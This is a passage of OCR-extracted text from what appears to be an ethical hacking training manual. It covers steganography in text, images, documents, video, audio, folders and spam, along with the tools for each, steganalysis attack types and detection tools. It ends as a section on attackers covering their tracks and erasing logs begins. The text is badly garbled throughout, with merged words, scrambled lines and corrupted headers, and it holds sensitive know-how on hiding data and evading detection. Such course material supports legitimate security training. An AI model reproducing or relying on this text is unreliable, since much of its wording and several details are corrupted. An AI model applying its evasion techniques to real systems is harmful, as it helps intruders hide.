‘embedding
the secret messages i n some way andhiding
the embedded data i n the
spamemails.Thistechniqueis referredto as spam/email
steganography.
DVD-ROM Steganography: In DVD-ROMsteganography, the user embedsthe content i n
audioandgraphicaldata,
NaturalText Steganography: Naturaltext steganography
is the process
of converting
freespeech
sensitive informationinto user-definable suchas a play.
HiddenOSSteganography:
HiddenOSsteganography of hiding
is the process one OSi n
another.
C++Source-Code Steganography: steganography,
In C++ source-code the user hidesa
set oftoolsin the files,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Whitespace
Steganography
hidesASCH
text
Invite spacesteganography
theuser themestagesin

cause spaces andtabsare not generally

ible in text Viewers,
byadding

themesage

se
UsetheSNOW eneryption
ofbuiltin
makes even fit i detected
themestageunreadable
to! to hidethemessage

Whitespace
Steganography
Whitespace
steganography
is usedto concealmessagesi n ASCIIt ext byadding
whitespaces
to
the endsof the lines.Becausespacesand tabsare generally not visiblei n text viewers, the
messageis effectively
hiddenfromcasualobservers.If built-in encryptionis used,the message
cannotbereadeven ifit is detected
=
snow
Source:http://www.darkside.com.au
Snowis a program for concealing messagesi n text filesbyappending tabsandspacesto
the endsof lines,and for extracting messages fromfilescontaining hiddenmessages.
Theuser hidesthe data i n the text file byappending sequencesof up to seven spaces,
interspersedwithtabs.Thisusually allowsthree bitsto be storedeveryeight columns.
There is an alternativeencoding schemethat uses alternating spacesand tabs to
represent Osand 1s. However, users rejectedit because it uses fewerbytes but requires
more columnsper bit (4.5 vs. 2.67). An appended tab characteri s an indicationof the
start of the data,which allowsthe insertion of mail and news headerswithout

the data.
corrupting
showni n the screenshot,
‘As attackersuse the Snowtool to hide messagesi n a text file

using
the command:
following
[CQS
snow
][-p ] ] |-m ] [outfile
‘Synopsis: passwd [-Iline-len
[-ffile message
[infile J]
Options:
©
theconcealing,
Compress
-€: extracting.
dataif or it if
uncompress

ical andCountermensores
Mackin ©by E-Comel
Copyright
-Q:Quietmode.I f not set, the programreportsstatistics suchas compression
andthe amount of availablestorage
percentages spaceused
-S: Report on the approximate amount of space availablefor a hiddenmessage
in

the
-p
text file. Linelength
password:
other
i s validbut ignore
If this is set, data encryption
options
occurs with this password during
or decryption
concealment, during extraction
-line-length:
Whenappending whitespaces, Snowwill always producelinesshorter
thanthis
value.
Bydefault,
-f message-file:
the line lengthis 80,

Theinputtext file will hidethe contents of thisfile.

-m Theinputtext
message-string:
unlessa
extracted
file
will
hidethecontents this
ofstring,
Note that,
line is somehowincludedi n the string,i t will not appear i n the
new
message,

Figure6.134:
Sereeshot
ofSnow

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Image
Steganography
“a. steganography,
Inimage theInformation
ishidden
in image
les
of formats
suchas
uifferent PNG, JPG,

{©image steganography
tools replace
cfect cannotbedetected
redundant
bythe humane ye of
bits image messagen suchaway
datawiththe thatthe

ImageFile Steganography
Techniques

coverage bychanging

Image
Steganography
Tools

open
stege

copa

ImageSteganography
Imagesteganographyallowsyou to concealyour secret message within an image.You can
exploit
the redundantbitsof the imageto concealyourmessage
within it. Theseredundantbits
are thosepartsof the imagethat havevery little effecto n it ifaltered.Thedetectionof this
alterationis not easy. You can concealyour informationwithin images of different formats
(e.g., JPG,BMP).
.PNG,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 are popular
Images objects―
“cover usedfor steganography
byreplacing
redundant
bitsof
image datawith the message,i n sucha way that humaneyes cannot detectthe effect.Image
steganographyis classified
into two types:imagedomainandtransform domain.In image
domain(spatial)techniques,a user embeds the messagesdirectly of the pixels.
i n the intensity
In transformdomain (frequency) techniques, first,thetransformationof imagesoccurs; then
the user embedsthe messagei n the image.
following
‘The figure
depicts
the imagesteganography
process andthe role of steganography
toolsin theprocess.

Covertnage
BS
eso steganosraphy

FileSteganography
Image Techniques
=

Least-Significant-Bit
The
Insertion
least-significant-bit insertion technique is the most commonlyusedtechnique
of
steganography,
image significant(LSB)
in whichthe least helps bit of eachpixel hold
secret data.TheLSBis the rightmost

method,
In the LSBinsertion binary the
of
bit of eachpixelan image.
dataof themessage are brokenup andinserted
into the LSBof eachpixel i n the imagefile in a deterministic
sequence. Modifyingthe
LSBdoesnot resulti n a visibledifferencebecause the net changeis minimalandcan be

to
the
indiscernible humaneye.Thus,its detectionis difficult.
Hiding
the data:
©. The
blue(RGB)model of
stegotool makesa copy an image palettewiththe helpof the red,green, and

Eachpixelof the 8-bit binary

numberLSBis substitutedwith one bit of the hidden
message
RGBcolori n the copied
‘Anew palette
is produced

Withthe new RGBcolor,the pixelis changed number

to an 8-bit binary
Supposeyou havechosena 24-bit imageto hide your secret data,whichyou can
i n digital
represent form,as follows
(00100111 11101001 11001000) (00100111 11001000 11101001) (11001000
0100111 11101001)
you want to hide the letter “H―
Suppose in the above24-bit image.The system
bybinary
the letter “HH―
represents digits you can change
01001000. To hidethis “H,―
the previousstreamto:

6
Module Page772 ical andCountermensores
Mackin
©
Copyright
by E-Comel
 4 4
!
01001000

6.136:
38
Youjust needto replace
Figure of
Example insertion

the LSBof eachpixelofthe imagefile,a s shownin the figure.

able
detect
thus to all
To retrieve this H at the other side,
the H.
the recipient
combines the LSBimagebitsandis

‘Masking
Filtering.
and
Masking
and filtering
techniques
exploitthe limitationsof humanvision, which is
of detecting
incapable slightchanges
i n images. Grayscale imagesand digital
watermarks
Masking
c an hideinformationi n a
way
similar
allowsyou to concealsecret data byplacing
to thatof watermarks o n paper.

the datain an imagefile. Youcan

use masking and filtering techniques on 24-bit-per-pixel and grayscale images.To hide
secret messages, you must adjust the luminosity andopacity of the image.If the change
i n luminance is insignificant,
notice that the imagecontains a hidden other
then people than the intendedrecipients
message. Thistechnique
as the imageremains undisturbed.In most cases, users perform
will fail to
can be easily
masking
applied
of JPEG
images.Lossy JPEGimagesare relatively immune to croppingand compression image
operations. Hence, you can hideyour informationi n lossy JPEG images,often usingthe
masking technique. If a messagehidesin significant areas of the picture,the
steganography image encodedwith a marking degrades at a lower rate underJPEG
compression.
Masking techniques can bedetectedwith simple statisticalanalysis but are resistant to
lossy compression andimagecropping,Theinformationis not hiddenin the noise but in
the significant
Algorithms
of
areas the image.

andTransformation
Thealgorithms andtransformation technique involveshiding secret informationduring
imagecompression. In this technique, the user concealsthe informationbyapplying
various compression algorithms andtransformation functions. A compression algorithm
andtransformationuses a mathematical functionto hidethe coefficientof the leastbit
during imagecompression. Thedataare embedded i n the cover imagebychanging the
coefficientsof a transformationof an image. Generally, JPEGimages are the most
suitablefor compression, as theycan functionat differentcompression levels.This
technique provides a high levelof invisibility
of secret data.JPEGimagesuse a discrete
cosine compression.
transform
Thereare
to achieve
algorithm:
threetypesof transformation
usedi n the compression
©. FastFouriertransformation

Discretecosine transformation
Wavelet
transformation
ical andCountermensores
Mackin ©by E-Comel
Copyright
 Iftheuser embedstheinformation domainof the LSBinsertion technique,
i n the spatial
informationhiddeni n the imagescan be vulnerableto attacks.An attackercan utilize
simple
signal-processing anddamage
techniques theinformation
hiddeni n the image
whenusing the LSBinsertion technique.
the imageundergoes
theseproblems,
certain processing to of
Thismay refer the loss information when
techniques like compression, To overcome
one can hidethe informationwith frequency-domain-based techniques
suchas fast Fourier transformation, discrete cosine transformation, or wavelet
Digital
transformation. dataare not continuous i n the frequency domain,Analysis of the
image data,to which frequency domain transformations are applied, becomes
extremelychallenging,
whichrenderscryptanalysis attacksdifficultto be performed,
Image
Steganography
Tools
Imagesteganography
tools detecthidden content i n imagesi n whichthe hidden data are
insertedin redundantbitsof datasources.Youcan use imagefilessuchas JPEG,GIF,BMP,and
PNGto conceal your data
=
Openstego
Source:https://www.openstego.com
OpenStego
is a steganography applicationthat provides the following
functions.
DataHiding:It can hideany datawithin a cover file (e.g,images)
© Watermarking:
Watermarking
files images)
with an
(e.g.,
beusedto detectunauthorizedfile copying,
invisiblesignature.
It can

@ opestege

FE[Wide
data
in looking
les
tari harmless

x
re Dest
Meme
Uo Adena Doaent bt

al 0) nc
watemartng
Gino

ay
mepent)
ened
nm
fy
enna

Fy vere
Atm= ==

Figure
6.137: ofOpenstogo
Screenshot

ical andCountermensores
Mackin ©by E-Comel
Copyright
Someexamples
ofimagesteganography
toolsare as follows:
*
QuickStego(http://quickerypto.com)
+
Suite Picsel(https://www.ssuitesoft.com)
+
(https://www.briggsoft.com)
CryptaPix
sifshuffle
(http://www.darkside.com.au)
StreamSteganography
PHP-Class (https://www.phpclasses.org)

Module
6 776
Page tical MakingandCountermensores
by
Copyright©
Comet
 DocumentSteganography
©Documentsteganography

theof
(©tincudes
end
techniqueof hiding
isthe
adttion whitespaces
secret messages
andtabsatthe ofthelines of
i n the form documents
transferred

Stegostiek Document

fwarcon. .
Ihe suet
Audio/Video
(6, fies x,
Wave) orary foe

(Pore ch, ee)

~
DocumentSteganography
Documentsteganography is the technique
of hiding secret messagestransferredi n the formof
documents. It includes
the additionof whitespaces andtabsat the endsof lines.A stego
documentis a cover documentcomprisingthe hidden message. Steganography algorithms,
referredto as the “stego
system,―
are employed to hidethe secret messages i n the cover
mediumat the senderend.Thesame algorithm i s usedbythe recipient to extract the hidden
message fromthe stego-document.
Thefollowing illustratesthedocumentsteganography
diagram process

YAN... =~ rNINN
mn
RL

2 —

6.138:Documentsteganography
Figure process

ical andCountermensores
Mackin ©by E-Comel
Copyright
DocumentSteganography
Tools
Documentsteganography
toolshelpin hiding suchas text or html files,
fileswithin documents,
Usingsteganography
methods.
=
Stegostick
Source:https://sourceforge.net
Stegostick is a steganographic
tool that allowsattackersto hideany file i n any otherfile.
It is based or videosteganography,
o n image,audio, whichhidesanyfileor message in
an image (BMP, etc.),audio/video
JPG,GIF, (MPG, WAV, etc.),or any other file format
(POF, EXE,CHM, etc.)
Stegestick

StegoStick
Readme
Hiding
Unttiding
Help
License

Path
Destination

EnterPassword

ek

igure Screenshotof Stgostick

6.139:

Someexamples
+
of documentsteganography
Steg)
tools
are listedas follows:

(http://stegjsourceforge.net)
*
OfficeXML(hetpsi//www.irongeek.com)
=
(http://www.darkside.com.au)
SNOW
Data Stash(https://www.skyjuicesoftware.com)
Texto(http://www.eberl.net)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Video Steganography
13
¢H
Seeeenteena ree
isomer
video such
iesof diferent
formats s.AV,.MPGS,
Pro
|
‘omnitide|
Genser
tomasTe
weno

Discrete
Cosine Transform
(OCT
manipulations

(tn/embecessnet)
oenhut
YYsustepvideo
ipa compression}

VideoSteganography
Theimage steganography discussed earliercan onlyhide a smallamount of datainsideimage
imagesteganography
cartier files.Thus, can onlybeusedwhensmallamountsofdataare to be
hiddenin the imagefiles. However, one can use video steganographywhenit is necessaryto
hidelarge amounts of datainside carrier files,
Videosteganography
refersto the hidingof secret information
in a carrier video file,The
informationis hidden i n video files of different formats,suchas .AVI,.MPG4, WMV,etc.
Discretecosine transform (DCT) manipulation is usedto addsecret data at the time of the
transformationprocessof thevideo.
Videofilescarrythe secret informationfromone endto another.Thisensures greater security
of your secret information,Numeroussecret messages can behiddenin video filesas every
frameconsistsof both imagesandsound.A s the carrier videofile is a moving stream of images
and sound,itis difficultforthe unintendedrecipient to notice the distortioni n the videofile
causeddueto the secret message,andtherefore, the messagemight go unobserved becauseof
the
continuous
steganographyof apply
all
flow thevideo.Youcan
to videosteganography.
thetechniques available
forimageandaudio

informationhiddeni n videofiles is nearly

‘The to be recognized
impossible bythe humaneye,
changepixel
asthe in
is negligible.
color also

ical andCountermensores
Mackin ©by E-Comel
Copyright
The following
toolsfacilitatethe hiding
of secret information
i n runningvideosusingvideo
steganography:
= OmnitiidePro
Source:http://omnihide.com
OmniHiidePROallowsyou to hide any secret file within an innocuous image,video,
music file,etc. The user can use or sharethe resultantstego file like a normalfile
withoutanyoneknowing the hiddencontent;thus,this tool enablesyou to save your

enhance enables
secret file from pryingeyes. It also

security,
you to adda password to hideyour file and

Hide
Hide
your
data fromthosepryingeves

e@ i)
gure ScreenshotofOrmnitide
6.140: PRO

Someexamples
ofvideosteganography
toolsare as follows:
+
(https://rtstegvideo.sourceforge.net)
RTSteganography
=
(https://sourceforge.net)
Stegostick
‘=
OpenPuft(https://embeddedsw.net)
MSUStegoVideo
(http://www.compression.ru)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Audio Steganography

Intrmattonin
aud es sich
a8MP3,AM, 38dWAY | S osgsaun

+2

1 akc e/a
ta/owreeoae
©steostek
msde swe

net
com)

©speeroag ipo.) I

Audio Steganography
Audiosteganography allowsyou to concealsecret messagewithin an audiofile suchas a WAV,
AU,or even MP3audiofile.it embedssecret messages i n audiofilesbyslightly changing the
binarysequenceof the audio file. Changes i n the audio file after insertion are not easily
detectable, andi n this way,the secret messages can besecured frompryingears.
The carrier audiofile shouldnot be allowedto bedistortedto avoid detectionof hidden
messages.Therefore, one shouldembedthe secret data i n sucha way that a slight change in
the audiofile can go unnoticed upon listening. Onecan hide information i n an audio file by
replacingthe LSBor byusing frequencies that are not audibleto the humanear (>20,000 H2).

if). pe)
pore

+ .
Ais >t x
"te
A

Figure6141:
Audiosteganography
process

Steganography
‘Audio Methods
Thereare certain methodsavailableto concealyour secret messages
i n audiofiles. Some
methods implement
noise signal,
techniques
thaton the
an algorithm relies inserting secret
while other methodsbelieve i n exploiting
to hideinformation.
information
sophisticated
i n the formof a

signal-processing

ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing
methodscan beusedto perform
audiosteganography
to hide information:
=
EchoDataHiding
In the echodata hiding method,you can embedthe secret informationi n the carrier
audiosignalbyintroducing
initial amplitude,
offsetbetween
decay rate,and offset or delay,
thecarrier signal
andechodecreases,
ofecho
an echointo it. Threeparameters are used, namely
to hide the secret data.Whenthe
theycombine at a certain pointof
time at whichthe humanear cannot distinguish betweenthe two signals. At this point,
you can heara n echoas an added resonance to the originalsignal.
However, this point
Of indistinguishable
soundsdepends on factorssuchas quality
of the original
audio
signal,
typeof sound,
andlisteneracuity.
To encode the resultantsignal
into binary
form,two differentdelay
times are used
Thesedelay times shouldbebelowthe levelof humanperception.Parameterssuchas
decayrate andinitialamplitudeshouldalsobeset belowthresholdaudiblevaluesso
thattheaudiocannot beheard.
Spread
Spectrum
Method
This method uses two versions of the spread
spectrum:direct-sequence
spread
spectrum(DSSS)
andfrequency-hopping spread (FHSS).
spectrum
Direct-Sequence
SpreadSpectrum
(DSSS):
DSSSis a frequency
modulation
technique
wherea communication devicespreads
a signal
oflowbandwidth
over a
broadfrequency
range to enablethe sharing
of a single
channelbetweenmultiple
steganography
users. TheDSSS techniquetransposes the secret messages
i n radio
wave frequencies.
DSSSdoesintroducesome randomnoise to the signal
Frequency-Hopping
SpreadSpectrum(FHSS):
In FHSS,
the user altersthe audiofile's
frequency
spectrumso that it hopsrapidlybetween frequencies. The spread
spectrummethod playsa significant
role in secure both
communications,
‘commercial
andmilitary.
LSBCoding
LSBencoding workssimilarly to the LSBinsertion technique, i n whichusers can insert a
secret binary in
message the leastsignificant bit of eachsampling point of theaudio
signal. Thismethodallowsone to hide enormous amounts of secret data.It is possible
to use the lasttwo significantbitsto insert secret binarydata, but at the riskof creating
noise in the audio file. Its poor immunity to manipulation makesthis methodless
adaptive. You can easily identify extra hidden data becauseof channel noise and
resampling.
ToneInsertion
Thismethodinvolvesembedding datai n the audiosignalbyinserting low-powertones.

for an eavesdropper
of
Thesetones are not audiblein the presencesignificantly
andthereforethe presenceof the secret message
to detectthe secret message
higher-power
is concealed.
fromtheaudiosignal.
audiosignals,
It is exceedingly
difficult
Thismethod

ical andCountermensores
Mackin ©by E-Comel
Copyright
 helpsto avoidattackssuchas low-passfiltering
and bit truncation. The audio
steganography
softwareimplements
one of theseaudio steganography methodsto
‘embed
thesecret datain the audiofiles.
PhaseEncoding
Phasecoding is describedas the phase i n whicha n initial audio segment is substituted
bya reference phasethat represents the data.It encodes the secret message bitsas
phaseshiftsin the phase spectrum of a digitalsignal,achieving a soft encodingi n terms

of
the signal-to-noise
Steganography
‘Audio Tools
ratio,

Thereare manytoolsavailableon the marketthat can helpto hide secret informationin an

audio file. The following are some examples
of audio steganography tools to hide secret
informationi n audiofiles
+
DeepSound
Source: http://jpinsoft.net
DeepSound allowsyou to hide any secret data i n audiofiles(WAV
and FLAC). It also
fromaudioCDtracks.In addition,
allowsyou to extract secret filesdirectly it can encrypt
thereby
secret files, enhancing security.

* 2

retony: Ceo
Damen, of DeepSound
6.142:Screenshot
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
Someexamples
ofaudiosteganography
toolsare listedasfollows:
=
(http://bitcrypt.moshe-szweizer.com)
BitCrypt
=
StegoStick
(https://sourceforge.net)
=
(https://www.petitcolas.net)
MP3stego
(hetp://www.quickerypto.com)
QuickCrypto
(https://github.com)
spectrology

ical andCountermensores
Mackin ©by E-Comel
Copyright
 FolderSteganography
Infoldersteganography,
es are hiddenand
withina folderanddo not appear
‘encrypted
to normal Windowsapplications,
including
||cuuson Fite
fe
‘eee
Explorer
Windows

=|

Folder Tools
Steganography

viele tossed)
nse Sets 4 (ht //awwinsbleseces

Folder Steganography
Folder steganography refersto hidingsecret informationi n folders.Filesare hiddenand
encrypted within a folderand are not seen bystandardWindows applications,including
WindowsExplorer.
FolderSteganography
Tools
Attackersuse folder steganography
toolsto hideand secure foldersandhidetheir confidential
data.Thesetoolssecure foldersusingdifferentencryptiontechniques.
+
GilisoftFileLockPro
Source:http://wugilsoft.com
and driversbylocking,
GilsoftFileLockProrestricts accessto files,folders, hiding,
or
password-protecting
them,Attackerscan thususe thistool for thesepurposes.
Withthis
program,nobody
can access or destroy
the attacker'sdatawithout a password

ical andCountermensores
Mackin ©by E-Comel
Copyright
 TGasoM
Fee
BroTO.8
(THN
Oey)tk

Toots
More

Settings 7

Someexamples
offoldersteganography
6.143:Screenshotof
Figure
toolsare listedasfollows:
GiSoft
File
Lock Pro

=
FolderLock(http://www.newsoftwares.net)
Hide Folders5 (https://fspro.net)
+
InvisibleSecrets4 (http://www.
invisiblesecrets.com)
Secure(https://maxpcsecure.com)
Max Folder
(hetp://www.quickerypto.com)
QuickCrypto

Module
Page 6 786
tical
Making
and byCountermensoresCopyright©
Comet
 Spam/Email
Steganography 13
¢H
1 Spanverat
{©Spam
emai steganography
tothe
technique
sending
secret
communist
lp messages
secretiby
to
dain thespamemats,
byhem
eters
spam/emall
messages
of
theSecretmesages
embedding
hing
some way
n

the embedded
andhiding

Ome
Encode

Spam/Email
Steganography
Spam/email
steganography
refersto the technique
of sending
secret messagesbyembedding
themandhiding
theembedded
datain spamemails.Variousmilitary supposedly
agencies use
thistechnique
with the helpof steganography
hidea secretmessagei n an email
algorithms.
Youcan use the Spam
Mimic
toolto

‘Spam/Email
Steganography
Tool
+
Spam
Mimic
Source:http://www.spammimic.com
Spam
Mimic is spam “grammar―for a mimic enginebyPeter Wayner.Thisencodes
secret messagesinto innocent-looking spamemails.Theencoderof this tool encodes
the secret messageas spamwith a password, fakePGP,fakeRussian,
andspace.

Modul
6 787
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure6.14:Screenshot Mimicshowing
of Spam encoded
process

©mic
Encoded

6.145:
Figure of Spam
Screenshot
showing
Mimic encoded
output

6
Module 788
Page ical
©andCountermensores
Mackin Copyright
by E-Comel
 Toolsfor Mobile Phones
Steganography
Steganography
Master Stegais

‘recanocane
mar

Tools for Mobile Phones

Steganography
Earlier,we discussed a wide range of applications/tools
that can be usefuli n hiding
secret
messages i n various typesof carrier media,suchas images,audio, andtext. Thesetools
video,
run on a variety of platformsof desktopsor laptopsonly.However, thereare alsomanymobile
appsavailablethat act as steganographytoolsfor mobilephones. Mobile userscan use these
appsto sendtheir secret messages.
Somesteganography toolsthat run on mobiledevicesas follows:
Steganography Master
Source:https://play.
google.com
‘Steganography
Masterhelps
i n hiding insidea photo.
secret messages Youcan encode
in a
your message then save or sendit to any mobileuser. You can thendecode
picture,
the message
onlyusingthe same app,but ifyou want to ensure that onlythe intended
receiver readsthe message,you can provide
a password,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 srecanocanpny
‘macrca

—*
© Encode
t ext

© decode
t ext

6.146:
Figure of Steganography
Screenshot Master

Stegais
Source:http://stegais.com
Stegais
can hide a message
in a imagefromthe photolibrary
selected or in a photo
takenbythe camera.

STEGAIS

Screenshotof Steg
Figure 6.147

ical andCountermensores
Mackin ©by E-Comel
Copyright
Someadditional toolsformobilephones
steganography as follows:
=
SPYPIX(https://www.juicybitssoftware.com)
=

=
Messages
Pixelknot:Hidden (https://guardianproject.info)
(https://www.talixa.com)
PocketStego
‘Steganography
Image(https://play.
google.com)
(https://github.com)
Steganography

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Steganalysis
© steganalyss
istheat of discovering
andrendering
covert messages using

|©hdden
Process
of
ning
steganography
Mec mesae ede txt auto, and eo caer

Steganalysis

‘Some
afthesuspect
signalsolesm ayhav ielevant dataor nize encode
into
them

Steganalysis
Steganalysis
is the processof discovering
the existenceof hiddeninformationi n a medium.itis
the reverse processof steganography.
It is an attackon information
securityi n which the
attacker,
referredto hereas a steganalyst,
tries to detectthe hiddenmessages embeddedin
and videocarrier mediums
images,text, audio, usingsteganography. Steganalysisdetermines
the encodedhiddenmessage and,if possible,
recovers the message.It can detectthe message
bylooking andunusually
at variances betweenbit patterns large
file sizes.
Steganalysis aspects:
has two thedetection anddistortion
of messages. phase,
In the detection
the analyst
observesthe relationships
betweenthe steganography tools,stego-media,cover,
andmessage. phase,
In thedistortion the analyst manipulates
the stego-media
to extract the
embeddedmessage andshouldberemovedaltogether.
anddecideswhetherit is useless
Thefirst stepi n steganalysis
is to discover a suspiciousimagethat may be harboring a message.
This is an attackon the hiddeninformation. Thereare two othertypesof attacksagainst
steganography: message and chasen-message attacks.In the former, the steganalysthas
knownhiddenmessage in the corresponding stego-image. Thesteganalyst determinespatterns
that arise from hidingand detecting this message.Thesteganalyst creates a messageusing 3
knownstegotoolandanalyzes thedifferences i n patterns.In a chosen-message attack,the
attackercreates steganography mediausingthe knownmessage and steganography tool (or
algorithm)
Coverimagesdisclose m ore visualcluesthanstego-images. to analyze
It is necessary stego
images to identify the concealedinformation.Thegap betweenthe cover image and stego-
imagefile size is the simplest evidently
Manysignatures
signature. use some of the color
schemes of the cover image.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Oncedetected, can destroy
an attacker a stego-image or modify the hiddenmessages.
It is
particularly
importantto understandthe overallstructure of the technologyand methodsto
detect thehiddeninformation
Somechallenges
of steganalysis
are asfollows:
the
foruncoveringactivities.

+
Suspect
informationstream may or may not haveencodedhiddendata
+
Efficientandaccurate detectionof hiddencontent within digital
magesis difficult
+
Themessage might beforebeing
havebeenencrypted insertedinto a fileor signal
Someofthe suspect files
signals may
or haveirrelevant
dataor noise encodedinto them

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Methods/Attackson Steganography
Steganalysis
Stego-only | ony the stage rab
objects forsale

Kaewnrateye
access
ego sachs tthe pet nto thecover mes

CChosemttego
| The
Thestackerhasacntto

aac
thesego-a betnd

parorsprobity nays
seoseth
to eat whether the gp Obie
ond
orginal dataare ee

Methods/Attackson Steganography
Steganalysis
Steganographyattackswork according to the typeof informationavailablefor the steganalyst
to perform steganalysis
on. Thisinformation may includea hiddenmessage, carrier (cover)
medium, stego-object,steganography tools,or algorithmsusedfor hiding information.Thus,
of steganalysis
the classification includes the followingtypesof attacks:stego-only, known:
stego,known-message, known-cover,chosen-message, chosen-stego,chi-square, distinguishing
statistical,
andblindclassifier.
=
Stego-only
attack
Ina stego-only attack,the steganalyst
or attackerdoes not have access to any
informationexceptthe stego-mediumor stego-object. the steganalyst
In this attack,
must try every possiblesteganography
algorithmand relatedattack to recover the
hiddeninformation.
attack
Known-stego
Thisattackallowsthe attackerto knowthe steganography
algorithm
as well as the
original
and stego-object.
The attackercan extract the hiddeninformationwith the
information
at hand.
Known-message attack
The known-message and the stego-medium
attack presumesthat the message are
available. thisattack,
Using one can
detect
the technique
usedto hidethe message.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 attack
Known-cover
Attackersuse the known-coverattackwhentheyknowboth the stego-object
andthe
original will
cover medium.This

in ofthe
changesthe format
enablea comparison betweenbothmediums detect
mediumandfindthe hiddenmessage. to
Chosen-message attack
The steganalyst uses a known message to generate a stego-object
byusingvarious
steganography toolsto findthe steganographyalgorithmusedto hidethe information.
Thegoal i n the stego-object
in thisattackis to determinepatterns that may pointto the
useof specific
steganography
toolsor algorithms.
Chosen-stego
attack
Thechosen-stego
attacktakesplacewhenthe steganalyst
knowsboth the stego-object
tool or algorithm
andsteganography usedto hidethe message.
Chi-square
attack
Thechi-squaremethodis basedon probability analysis to test whethera given stego-
object
and the originaldata are the same or not. If the difference betweenboth is
nearlyzero, then no data are embedded; otherwise,the stego-object includes
‘embedded
datainside.
Distinguishing
statistical
attack
In the distinguishing
statisticalmethod,the steganalyst or attacker analyzes
the
embeddedalgorithm usedto detect distinguishing
statisticalchanges,
alongwith the
lengthof the embeddeddata
Blindclassifierattack
In the blind classifiermethod,a blind detectoris fed with the original
or unmodified

stego-object andoriginal
of
datato learntheappearancethe original

data.
datafrommultiple Theoutput
perspectives.
of the blind detectoris usedto train the classifierto detectdifferencesbetweenthe

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Detecting
Steganography
(Text,
image, Audio,and Video Files)

1G T he
canbe
detected
by ange
in
h den dts inanimage determining ia, format he

"©Te
statistical
(©T he

atic
image
be
anatamethodi sed for
aris eth an eed
scanning

for etecng a l o tenn sabes

{a
Theinaude
can
be
scanned
for
iden
frequencies information

Detecting (Text,
Steganography Audio,andVideoFiles)
Image,
Steganography is the art of hidingeither confidentialor sensitive informationwithin a cover
medium.In this method, the unusedbitsof datai n computer filessuchas graphics,digital
images,text, and HTML, helpi n hidingsensitive information from unauthorizedusers.
Detectionof thehidden
datainvolves approaches
different depending
on the file typeused.

Thefollowing
filetypesrequirespecific
methodsto detecthidden
messages.
Text File
Fortext files,alterationsare madeto the characterpositionsto hidethe data.Onecan
detectthesealterationsbylooking thelanguage
fortext patternsor disturbances, used,
line height, or an unusualnumberof blank spaces.A simple word processor can
sometimes revealtext steganography as it displays the spaces,tabs,and other
characters thatdistortthetext’s
presentationduringtext steganography.
Textsteganography
can bedetectedbytaking
a closerlook at the following
aspects:
i n the stego-object
Unusual patterns
© Appended andinvisible
extra spaces characters
File
Image
Theinformationhiddeni n an imagecan bedetectedbydetermining
changes i n size,file
format,
Thefollowing
lastmodified
lastmodified, timestamp,andcolorpalette
the file.
imagesteganography:
pointscan helpyou in detecting
of
Severaldisplay
distortionsin images
©
Sometimes
become
grossly
images may degraded
ical andCountermensores
Mackin ©by E-Comel
Copyright
 Detectionof anomaliesthrough
evaluatingtoo manyoriginal imagesand stego-
luminance,
imagesconcerning colorcomposition, pixelrelationships,
etc.
>
Exaggerated “noise―
Statisticalanalysis
methodshelpto imagefor steganography.
scan an Whenever you
insert a secret messageinto an n o longer
image, LSBs
a re random.Withencrypted data
that hashighentropy,the LSBof the cover will not contain information
about the
original
and is more or lessrandom.Byusing statisticalanalysis
on the LSB,
you can
identify
thedifferencebetweenrandom valuesandrealvalues.
AudioFile
Audiosteganography is a processof embedding confidentialinformationsuchas private
documentsandfiles i n digitalsound.Statisticalanalysis
methodscan be usedto detect
audiosteganography Theinaudiblefrequencies
as it involvesLSBmodifications. can be
scannedfor hiddeninformation.Theodddistortionsand patterns showthe existence of
secret
data,
VideoFile
Detection of secret data i n videofiles includesa combinationof the methodsusedi n
imageandaudiofiles.Special codesignsandgestures helpi n detecting
secret data,
Bothaudioandvideosteganographyare quitedifficult
to detect,compared to othertypessuch
as imageanddocument. Moreover, hardto detectgood
it is extremely steganographyof any
type.However,carefulanalysis
of audioandvideosignals for hiddeninformationmayincrease
chances it correctly.
of detecting

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DetectionTools
Steganography

DetectionTools
Steganography
Steganography
detectiontools allow you to detectand recover hiddeninformation
digital
=
media,
asteg
audio,
images,
video.
such
as and

Source:https://github.com
Thezstegtool is usedto detectstegano-hidden
datai n PNGandBMPimage files.
shownin the
‘As screenshot,
you can use the zstegtool to detectthe hiddensecret
message
inthe
image
file.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Parrot Terminal
Search Terminal Help

6.148Screenshot
Figure of ste
Someexamples
of steganography
detectiontoolsare as follows:
StegoVeritas(https://github.com)
+
stegextract(https://github.com)
‘=
(https://www.wetstonetech.com)
StegoHuntâ„¢
Studio(htto://stegstudio,sourceforge.net)
‘Steganography
Virtual Steganographic
Laboratory (http://vsl.sourceforge.net)
(VSL)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

1 System
HackingConcepts Escalating
Privileges

Gaining
Recess Maintaining
Accoss

2 @-- e
Clearing
Logs
In the previoussection,w e saw howan attacker can hidemaliciousfileson a targetcomputer
using various steganographic techniques, NTFSstreams, and other techniques to maintain
futureaccess to the target.Oncethe attackerhassucceeded i n performing this malicious
operation, the next stepinvolvesremoving any resultanttraces/tracks
i n the system.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Tracks
Covering
(Onceintruders havesucessfully
fsined administrator acess ona
system, theywl try t0 cover thle
tracksf e avoiddetection ett comms

attacker uses the following

‘The techniques
to cover his/her tracks on the targetsystem

@ veering
on
@cows nents

@©iow vessin oct

Tracks
Covering
Covering during
tracksis one of the main stages systemhacking.In this stage,theattackertries
hideand avoidbeing
to detectedor “traced bycoveringall “tracks,―
out― or logs,generated
while accessing
the targetnetworkor computer.
We now look at howthe attackerremoves
traces of an attackon
targetcomputer.
a

evidence
Erasing i s a must for any attacker
who wouldlike to remain obscure.It is amethod
usedto evadea traceback.It starts with erasing the contaminatedlogsand possible error
